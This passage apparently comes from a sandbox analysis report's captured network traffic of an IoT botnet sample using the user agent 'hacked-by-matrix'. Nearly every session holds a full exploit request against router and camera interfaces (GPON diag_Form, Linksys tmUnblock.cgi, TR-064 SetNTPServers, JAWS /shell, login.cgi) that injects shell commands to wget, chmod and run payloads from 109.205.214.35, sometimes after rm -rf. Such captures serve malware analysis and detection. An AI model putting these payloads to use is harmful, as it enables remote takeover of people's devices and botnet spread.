                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:31.665211916 CET50INHTTP/1.1 411 Length Required
                                                        Connection: close
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.665286064 CET1INData Raw: 0a
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.964509010 CET50INHTTP/1.1 411 Length Required
                                                        Connection: close
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.964570045 CET1INData Raw: 0a
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1611192.168.2.1360886185.81.4.1988080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.434508085 CET279INHTTP/1.0 400 Bad request
                                                        Content-Type: text/html
                                                        Content-Length: 193
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 77 68 69 63 68 20 74 68 69 73 20 77 65 62 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 0a 20 20 20 20 20 20 67 72 6f 6b 2e 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>Bad Request</title> </head> <body> <h1>Bad Request</h1> <p>Your browser sent a request which this web server could not grok.</p> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1612192.168.2.1334462178.79.175.19580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.469243050 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1613192.168.2.1354216201.251.79.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.478662014 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1614192.168.2.1359048113.182.198.108080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.561786890 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1615192.168.2.1344670166.163.134.1888080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:22.979443073 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1616192.168.2.1350964212.172.221.1180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:23.035864115 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:23.211009979 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:23 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1617192.168.2.1360826212.93.102.11180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:24.272155046 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:27.407346964 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:33.548258066 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:45.580254078 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1618192.168.2.135889279.149.35.327547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:24.493428946 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1619192.168.2.1340348212.90.125.205443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:24.783479929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1620192.168.2.13568565.89.28.84443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:24.783498049 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1621192.168.2.1355464212.144.166.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:24.783499956 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1622192.168.2.135227635.201.49.8380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.643688917 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:26.156223059 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:26.254445076 CET1286INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html; charset=UTF-8
                                                        Referrer-Policy: no-referrer
                                                        Content-Length: 1555
                                                        Date: Thu, 21 Mar 2024 04:23:26 GMT
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                        Mar 21, 2024 05:23:26.254487038 CET450INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                        Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1623192.168.2.1352972206.74.29.8980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.653209925 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:25.987337112 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:26.103332996 CET364INHTTP/1.1 505 HTTP Version not supported
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 140
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1624192.168.2.1343734185.20.144.18880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.750837088 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:25.935700893 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1625192.168.2.135170279.96.170.23480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:25.750998974 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:25.941677094 CET285INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 128
                                                        Connection: close
